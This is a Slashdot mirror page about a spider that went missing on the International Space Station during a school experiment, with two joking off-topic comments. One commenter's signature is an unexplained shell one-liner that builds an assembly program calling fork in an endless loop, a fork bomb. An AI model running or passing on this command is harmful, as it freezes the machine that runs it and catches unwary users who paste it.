Slashdot Mirror


Spider Missing After Trip To Space Station

Garabito writes "A spider that had been sent to the International Space Station for a school science program was lost. Two arachnids were sent in order to know if spiders can survive and make webs in space, but now only one spider can be seen in the container. NASA isn't sure where the other spider could have gone. I, for one, welcome our new arachnid overlords."

2 of 507 comments (clear)

  1. Re:Spiders are not cannibals by Shakrai · · Score: 0, Offtopic

    I smoked pot once. But I DID NOT inhale. Will you hire me?

    Nope. I'm not gonna hire some pansy who was too afraid to inhale ;)

    --
    I want peace on earth and goodwill toward man.
    We are the United States Government! We don't do that sort of thing.
  2. Re:Where oh where? by Hal_Porter · · Score: 1, Offtopic

    No one will believe this, but I didn't actually post the above comment.

    --
    echo -e 'global _start\n _start:\n mov eax, 2\n int 80h\n jmp _start' > a.asm; nasm a.asm -f elf; ld a.o -o a;